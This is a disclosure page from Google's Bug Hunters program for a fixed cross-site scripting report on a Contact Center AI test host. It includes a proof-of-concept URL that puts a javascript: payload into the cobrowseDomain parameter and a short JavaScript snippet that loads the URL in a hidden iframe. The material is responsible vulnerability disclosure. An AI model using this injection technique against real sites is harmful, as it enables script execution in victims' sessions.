Skip to Content (Press Enter)
Google
Bug Hunters
XSS on https://security-test-ari76op.uc1.ccaiplatform.com
Reported by:
NDevTK
Google VRP
triaged
17:52 | Nov 10, 2022
accepted
23:59 | Nov 10, 2022
fixed
10:00 | Jan 19, 2023
Summary:
XSS on
https://security-test-ari76op.uc1.ccaiplatform.com
Product:
Google Cloud
URL:
https://security-test-ari76op.uc1.ccaiplatform.com/agent/?type=popup&popup=cobrowse&cobrowseDomain=javascript:alert(window.origin);%2F%2F
Vulnerability type:
Cross-site scripting (XSS)
Details
let f = document.createElement('iframe');
f.hidden = true;
f.src = 'https://security-test-ari76op.uc1.ccaiplatform.com/agent/?type=popup&popup=cobrowse&cobrowseDomain=javascript:alert(window.origin);%2F%2F';
document.body.appendChild(f);
Wait a "small" amount of time for alert to happen.
Attack scenario
Any website can get XSS on Contact Center AI.
(I dont know much about it not created an account yet)
Found as part of grant issue 258419050
登录
使用 Google 账号登录